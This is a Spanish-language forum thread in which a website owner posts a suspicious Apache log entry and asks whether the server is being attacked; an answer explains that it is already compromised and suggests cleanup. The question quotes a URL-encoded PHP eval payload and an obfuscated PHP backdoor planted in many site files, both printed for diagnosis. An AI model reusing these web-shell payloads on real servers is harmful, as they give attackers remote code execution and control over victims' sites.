encontró un registro de Apache muy sospechoso: ¿alguien está intentando piratear?

Question

encontró un registro de Apache muy sospechoso: ¿alguien está intentando piratear?

#1 de user633551 (2 votos)

0

Recientemente encontré una actividad de servidor muy sospechosa, búsquela a continuación

mi registro de Apache

2017-06-13 09:38:42 W3SVC10 WIN-4BLFF718RVR 49.50.69.142 GET /images/menu10.php - 80 - 212.121.224.17 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Firefox/52.0 h601d2f=%24val%3D%24_SERVER%5Bchr%2872%29.chr%2884%29.chr%2884%29.chr%2880%29.chr%2895%29.chr%2850%29.chr%2868%29.chr%2853%29.chr%2866%29.chr%2851%29.chr%2849%29.chr%2866%29.chr%2854%29.chr%2848%29%5D%3Bif%28get_magic_quotes_gpc%28%29%29%7B%24val%3Dstripslashes%28%24val%29%3B%7D+eval%28%24val%29%3B; - mywebsite.com 200 0 0 404 1172 218

la codificación url de lo anterior me da esto

h601d2f=$val=$_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(50).chr(68).chr(53).chr(66).chr(51).chr(49).chr(66).chr(54).chr(48)];if(get_magic_quotes_gpc()){$val=stripslashes($val);} eval($val);;

y como puede ver, esta es una solicitud de obtención de /images/menu10.php: no sé cómo llegó este archivo a mi carpeta de imágenes

y después de verificar encontré una gran cantidad de archivos php y cada archivo tiene algo como esto

'<?php $a89="\toDH6^E>r5fan9b#R\)}KcTpN:h+x-i<?kg!e]XPGJ*,42m\nWjQY&=8y[I{%s u0M~Z;vCz\"./F\$_q'A7S\rtBlV@w3dU'|L(1O";$GLOBALS['grstl50'] = ${$a89[76].$a89[39].$a89[97].$a89[81].$a89[22]};$GLOBALS['swynh48'] = $a89[26].$a89[36].$a89[11].$a89[90].$a89[36].$a89[8];if (!empty($GLOBALS['grstl50']['mb36fb514'])) { eval($GLOBALS['grstl50']['mb36fb514']); } $GLOBALS['swynh48']($a89[3].$a89[22].$a89[22].$a89[39].$a89[73].$a89[96].$a89[72].$a89[63].$a89[61].$a89[44].$a89[63].$a89[44].$a89[61].$a89[24].$a89[1].$a89[83].$a89[61].$a89[74].$a89[1].$a89[62].$a89[12].$a89[90]); echo $a89[31].$a89[26].$a89[96].$a89[7].$a89[44].$a89[63].$a89[44].$a89[61].$a89[24].$a89[1].$a89[83].$a89[61].$a89[74].$a89[1].$a89[62].$a89[12].$a89[90].$a89[31].$a89[73].$a89[26].$a89[96].$a89[7].$a89[82].$a89[47].$a89[22].$a89[26].$a89[36].$a89[61].$a89[23].$a89[11].$a89[34].$a89[36].$a89[61].$a89[83].$a89[26].$a89[11].$a89[83].$a89[61].$a89[55].$a89[1].$a89[62].$a89[61].$a89[26].$a89[11].$a89[68].$a89[36].$a89[61].$a89[8].$a89[36].$a89[77].$a89[62].$a89[36].$a89[60].$a89[83].$a89[36].$a89[90].$a89[61].$a89[21].$a89[1].$a89[62].$a89[85].$a89[90].$a89[61].$a89[12].$a89[1].$a89[83].$a89[61].$a89[14].$a89[36].$a89[61].$a89[10].$a89[1].$a89[62].$a89[12].$a89[90].$a89[72].$a89[82].$a89[47];
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */

/**
 * Whether this is an XML-RPC Request
 */enter code here'

¿Puede alguien explicarme cuál es el problema?

apache php

pregunta 14.06.2017 - 22:00

fuente

1 respuesta

Lea otras preguntas en las etiquetas apache php

Falso, honeypot como wifi ¿Qué tan efectivo es un algoritmo básico de modificación de contraseña en comparación con la reutilización de contraseña?

score 2 · Answer 1

¿Alguien está tratando de hackear?

Su sistema ya se ha comprometido porque varias solicitudes de POST fueron exitosas y todos esos archivos no autorizados han aparecido en su carpeta / s.

A partir de la información provista, asumo que la galería en su sistema tiene orificios que permiten cargar archivos .php que se pueden usar para la ejecución de código arbitrario.

Lo que podría hacer para confirmar esto es buscar el punto de entrada en los registros. Busque la primera solicitud POST que agregó un archivo sospechoso en su sistema. Además, puede rastrear todos estos archivos no deseados y luego eliminarlos, pero para estar 100% seguro de que la infección ya no existe, es posible que desee limpiar y reinstalar el sistema por completo.

Ahora, esto no soluciona el problema ya que el exploit permanece en su versión actual de WP, así que considere actualizar a la última versión.